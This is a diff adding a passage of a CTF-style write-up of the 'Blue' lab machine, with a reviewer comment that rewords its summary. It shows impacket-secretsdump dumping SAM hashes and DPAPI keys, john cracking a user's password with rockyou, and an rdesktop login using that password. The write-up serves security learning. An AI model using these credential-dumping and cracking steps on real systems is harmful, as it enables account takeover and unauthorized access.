content/post/blue-boot2-root-writeup.md

```diff
@@ -0,0 +1,699 @@
+
+```bash
+root@kali:~/ctf/extractor# impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
+Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
+
+[*] Target system bootKey: 0x55bd17830e678f18a3110daf2c17d4c7
+[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
+[*] Dumping cached domain logon information (domain/username:hash)
+[*] Dumping LSA Secrets
+[*] DPAPI_SYSTEM 
+dpapi_machinekey:0xdc31ac35e19a18b00b5b066de3e8da898bf8da71
+dpapi_userkey:0xfaea7403f42b58e1a5dd35ee816185a953b1c795
+[*] NL$KM 
+ 0000   45 94 4A 93 A2 9D D2 8E  2B CF 5F DF 66 75 59 4C   E.J.....+._.fuYL
+ 0010   E9 BC B8 91 2C 66 59 1E  BF 53 1E 77 BE C2 9B 74   ....,fY..S.w...t
+ 0020   73 64 04 B4 56 EA 7D 6F  BA C2 1B 7E F0 BA 53 67   sd..V.}o...~..Sg
+ 0030   E6 E6 66 84 95 1F 90 60  42 EE 34 0A EE 99 9F 55   ..f....`B.4....U
+NL$KM:45944a93a29dd28e2bcf5fdf6675594ce9bcb8912c66591ebf531e77bec29b74736404b456ea7d6fbac21b7ef0ba5367e6e66684951f906042ee340aee999f55
+[*] Cleaning up...
+
+root@kali:~/ctf/extractor# impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL | egrep 'Administrator|Guest|Jon' > hash.txt
+root@kali:~/ctf/extractor# john -format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
+Using default input encoding: UTF-8
+Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
+Warning: no OpenMP support for this hash type, consider --fork=2
+Press 'q' or Ctrl-C to abort, almost any other key for status
+                 (Administrator)
+alqfna22         (Jon)
+2g 0:00:00:00 DONE (2020-11-11 13:43) 2.985g/s 15224Kp/s 15224Kc/s 15231KC/s alr19882006..alpusidi
+Warning: passwords printed above might not be all those cracked
+Use the "--show --format=NT" options to display all of the cracked passwords reliably
+Session completed
+```
+
+#### Wrapping Up
+With the credentials in hand I decided to try my had at a remote desktop session. Which happily gave me access to a desktop.
+
+```bash
+root@kali:~# rdesktop -u Jon 10.10.87.38
+```
+
+![Jon's PC](/img/blue_boot2root_jon_pc.png)
+
+### Summary
+This attack really hammered in how simple metasploit makes some of the more tedious tasks. Not only sourcing and packing an exploit but in things like capturing the outputs of scans, handling setting up listeners to catch shells and the myriad of benefits meterpreter provides in stabalizing a shell, transfering files and pivoting. Despite all that, it was massively educational to be forced to read the exploit I was attempting to understand how to prepare it for use and it was fun attempting to pivot with only the resources I had available in the limited shell. 
```

Comment:
This experience really hammered in how simple metasploit makes these attacks for us. It does a great deal: sourcing and packing an exploit, capturing the outputs of scans, handling setting up listeners to catch shells. Meterpreter also provides a myriad of benefits like stabilizing a shell, transferring files, and pivoting. Despite having to do all those tasks manually, it was exceptionally educational and fun to have to read and understand the exploits I attempted and then carry them out with scarce resources in a limited shell.